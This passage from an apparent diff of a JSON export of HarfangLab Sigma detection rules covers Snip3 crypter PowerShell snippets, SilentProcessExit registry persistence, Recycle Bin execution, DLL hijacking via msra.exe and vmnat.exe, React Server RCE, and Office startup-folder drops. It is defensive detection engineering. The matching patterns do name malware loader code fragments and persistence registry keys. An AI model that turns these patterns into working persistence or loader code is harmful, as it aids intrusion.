(tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n", + "rule_creation_date": "2020-10-14", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1548.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.607132Z", + "creation_date": "2026-03-23T11:45:34.607135Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.607142Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time", + "https://attack.mitre.org/software/S1086/", + "https://attack.mitre.org/techniques/T1059/001/" + ], + "name": "t1059_001_snip3_crypter_detected.yml", + "content": "title: Snip3 Crypter Detected\nid: 13b86531-8b7b-4ef9-bb5a-3d56f788744b\ndescription: |\n Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\n Snip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\n It is recommended to investigate the PowerShell script to determine its legitimacy.\nreferences:\n - https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time\n - https://attack.mitre.org/software/S1086/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/11/12\nmodified: 2025/02/04\nauthor: 
HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.execution\n - attack.t1059.001\n - attack.t1059.005\n - attack.command_and_control\n - attack.t1104\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Snip3\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Obfuscation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains|all:\n - 'Add-Type -AssemblyName Microsoft.VisualBasic'\n - '[System.Text.Encoding]::Default.GetString(@('\n - '[System.IO.File]::WriteAllText([System.Environment]::GetFolderPath('\n - ' = [Microsoft.VisualBasic.Strings]::Split((Get-WMIObject win32_operatingsystem).name,\"|\")[0]'\n - ' [System.Convert]::ToString((get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID))'\n - ' Start-Sleep -Milliseconds '\n\n selection_2:\n PowershellCommand|contains|all:\n - 'function DropToStartup() {'\n - '[System.Text.Encoding]::Default.GetString(@('\n\n condition: 1 of selection_*\nlevel: high\n# level: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "13b86531-8b7b-4ef9-bb5a-3d56f788744b", + "rule_name": "Snip3 Crypter Detected", + "rule_description": "Detects common PowerShell snippets present in Snip3 Crypter, a multi-stage remote access trojan (RAT) loader that has been used since at least 2021.\nSnip3 is a sophisticated Crypter-as-a-Service crypter that has been used to obfuscate and load numerous strains of malware including AsyncRAT, RevengeRAT, AgentTesla and more.\nIt is recommended to investigate the PowerShell script to determine its legitimacy.\n", + "rule_creation_date": "2024-11-12", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + 
"attack.execution", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1059.005", + "attack.t1104", + "attack.t1547.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "14032905-0b18-4b4a-851c-3fafff461ba1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.076139Z", + "creation_date": "2026-03-23T11:45:34.076141Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.076146Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit", + "https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/", + "https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html", + "https://attack.mitre.org/techniques/T1546/012/" + ], + "name": "t1546_012_persistence_using_silent_process_exit.yml", + "content": "title: Possible SilentProcessExit Registry Persistence Added\nid: 14032905-0b18-4b4a-851c-3fafff461ba1\ndescription: |\n Detects a change in a SilentProcessExit configuration 
in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\n Silent Process Exit happens when a process is terminated gracefully, by itself or another process. Windows allows user to trigger events in case of a Silent Process Exit.\n Attackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\n It is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit\n - https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/\n - https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2022/09/19\nmodified: 2025/03/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_silence_process_exit:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\MonitorProcess'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\\\*\\ReportingMode'\n\n selection_image_options:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\GlobalFlag'\n Details: 'DWORD (0x000002??)'\n\n exclusion_empty:\n Details: '(Empty)'\n\n exclusion_msiexec:\n ProcessCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\streem.exe\\GlobalFlag'\n - 
'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\BoxUI.exe\\GlobalFlag'\n\n exclusion_captureone:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\CaptureOne.Win.*.tmp'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\captureone.exe\\ReportingMode'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\captureone.exe\\GlobalFlag'\n\n exclusion_ManagerAdmin:\n ProcessImage: '?:\\Program Files\\Dassault Systemes\\\\*\\win_b??\\code\\bin\\DSYSysIRManagerAdmin.exe'\n ProcessSigned: 'true'\n ProcessInternalName: 'DSYSysIRManagerAdmin.exe'\n ProcessSignature|contains: 'DASSAULT'\n\n exclusion_adobe:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n - '?:\\Program Files (x86)\\Common Files\\Adobe\\Adobe Desktop Common\\HDBox\\Setup.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Illustrator.exe\\GlobalFlag'\n ProcessSigned: 'true'\n ProcessSignature|contains: 'Adobe Inc.'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "14032905-0b18-4b4a-851c-3fafff461ba1", + "rule_name": "Possible SilentProcessExit Registry Persistence Added", + "rule_description": "Detects a change in a SilentProcessExit configuration in the registry, possibly indicative of persistence using Silent Process Exit Monitoring.\nSilent Process Exit happens when a process is terminated gracefully, by itself or another process. 
Windows allows user to trigger events in case of a Silent Process Exit.\nAttackers can therefore use this feature as a persistence mechanism to start malicious programs when a Silent Process Exit happens on the system.\nIt is recommended to analyze the process responsible for the registry modification and to analyze the file pointed to by the registry value to look for malicious content or actions.\n", + "rule_creation_date": "2022-09-19", + "rule_modified_date": "2025-03-03", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1546.012" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "14b8dddd-67f2-4c76-b54c-d77daec6b252", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627205Z", + "creation_date": "2026-03-23T11:45:34.627208Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627212Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1564/", + "https://attack.mitre.org/techniques/T1036/" + ], + "name": 
"t1564_suspicious_recycle_bin.yml", + "content": "title: Suspicious Process Executed from Recycle Bin Folder\nid: 14b8dddd-67f2-4c76-b54c-d77daec6b252\ndescription: |\n Detects a suspicious execution from Recycle Bin folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2025/01/28\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\\\?Recycle.Bin\\'\n\n # This is handled by the rule 04fc1ab5-7c16-4e89-9c17-8b4dc21c0d44\n filter_deleted_file:\n Image|startswith: '?:\\\\?Recycle.Bin\\S-1-5-21-*\\$R'\n\n # Teams updater doing weird things\n exclusion_teams:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "14b8dddd-67f2-4c76-b54c-d77daec6b252", + "rule_name": "Suspicious Process Executed from Recycle Bin Folder", + "rule_description": "Detects a suspicious execution from Recycle Bin folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to determine if the executed binary is legitimate as well as to investigate the context of this execution.\n", + "rule_creation_date": "2025-01-28", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + 
"rule_technique_tags": [ + "attack.t1036", + "attack.t1564" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "14c2f793-59ba-4331-86c7-8146946b4943", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591425Z", + "creation_date": "2026-03-23T11:45:34.591429Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591437Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_msra.yml", + "content": "title: DLL Hijacking via msra.exe\nid: 14c2f793-59ba-4331-86c7-8146946b4943\ndescription: |\n Detects potential Windows DLL Hijacking via msra.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the 
malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msra.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\NDFAPI.DLL'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\UxTheme.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "14c2f793-59ba-4331-86c7-8146946b4943", + "rule_name": "DLL Hijacking via msra.exe", + "rule_description": "Detects potential Windows DLL Hijacking via msra.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory 
and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "14c9835b-73bc-4bc6-a202-6591317a11fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.082369Z", + "creation_date": "2026-03-23T11:45:34.082371Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.082375Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": 
"t1574_001_dll_hijacking_vmnat.yml", + "content": "title: DLL Hijacking via vmnat.exe\nid: 14c9835b-73bc-4bc6-a202-6591317a11fb\ndescription: |\n Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/05/16\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vmnat.exe'\n ProcessSignature: 'VMware, Inc.'\n ImageLoaded|endswith: '\\shfolder.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "14c9835b-73bc-4bc6-a202-6591317a11fb", + "rule_name": "DLL Hijacking via vmnat.exe", + "rule_description": "Detects potential Windows DLL Hijacking via vmnat.exe from VMware.\nDLL 
hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate executable and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-05-16", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.628587Z", + "creation_date": "2026-03-23T11:45:34.628589Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.628593Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053", + "https://attack.mitre.org/techniques/T1190/" + ], + "name": "t1190_potential_react_server_rce_exploitation_linux.yml", + "content": "title: Potential React-Server RCE Exploitation (Linux)\nid: 14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80\ndescription: |\n Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\n CVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\n It is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://cert.ssi.gouv.fr/actualite/CERTFR-2025-ACT-053\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/12/05\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2025-55182\n - classification.Linux.Exploit.React2Shell\n - classification.Linux.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentCommandLine|startswith: 'next-server'\n\n exclusion_legitimate_subprocesses:\n CommandLine|contains:\n # MISP\n - '/var/www/MISP/app/Console'\n # Jest worker\n - '/next/dist/compiled/jest-worker/'\n # Supercronic\n - 'supercronic -quiet /app/docker/cronjobs'\n # PostCSS\n - '.next/dev/build/postcss.js'\n - 'cat /proc/mounts'\n - 'cat /proc/stat'\n - 'df -kPT'\n - 'df -lkPTx'\n - 'node */.next/transform.js'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80", + "rule_name": "Potential React-Server RCE Exploitation (Linux)", + "rule_description": "Detects suspicious 
command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\nCVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\nIt is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\n", + "rule_creation_date": "2025-12-05", + "rule_modified_date": "2026-02-11", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.initial_access" + ], + "rule_technique_tags": [ + "attack.t1190" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "1548f31b-b093-436b-a9cb-97bc28e00de7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.088839Z", + "creation_date": "2026-03-23T11:45:34.088841Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.088845Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1547/001/" + ], + "name": "t1547_001_persistence_file_startup_phishing_attack.yml", 
+ "content": "title: Suspicious File Added/Modified in Startup Directory by Office Application\nid: 1548f31b-b093-436b-a9cb-97bc28e00de7\ndescription: |\n Detects when a file is added or modified in the startup directory in relation with a phishing attack.\n After compromising a host, attackers may achieve persistence by adding a program to a startup folder.\n It is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2022/06/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'write'\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n\n selection_image:\n ProcessImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_parentimage:\n ProcessParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_extension:\n Path|endswith:\n - '.bat'\n - '.chm'\n - '.cmd'\n - '.cpl'\n - '.exe'\n - '.hta'\n - '.js'\n - '.jse'\n - '.lnk'\n - '.ps1'\n - '.scr'\n - '.vbe'\n - '.vbs'\n - '.wsf'\n\n exclusion_onenote:\n ProcessImage: '*\\Office??\\ONENOTE.EXE'\n Path:\n - '*OneNote*.lnk' # Envoyer a OneNote.lnk / Send to OneNote.lnk / An OneNote senden.lnk\n - '*\\OneNote ???? 
*.lnk' # OneNote 2010 Screen Clipper and Launcher.lnk / OneNote 2010 - Capture d'ecran et lancement.lnk\n\n exclusion_astngo:\n ProcessCommandLine|contains: '--single-argument https://my.astngo.com/'\n\n condition: selection_event and selection_extension and (selection_image or selection_parentimage) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "1548f31b-b093-436b-a9cb-97bc28e00de7", + "rule_name": "Suspicious File Added/Modified in Startup Directory by Office Application", + "rule_description": "Detects when a file is added or modified in the startup directory in relation with a phishing attack.\nAfter compromising a host, attackers may achieve persistence by adding a program to a startup folder.\nIt is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\n", + "rule_creation_date": "2022-06-20", + "rule_modified_date": "2025-02-19", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1547.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "156f56a4-6a01-405e-9c87-d4546f76e6a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": 
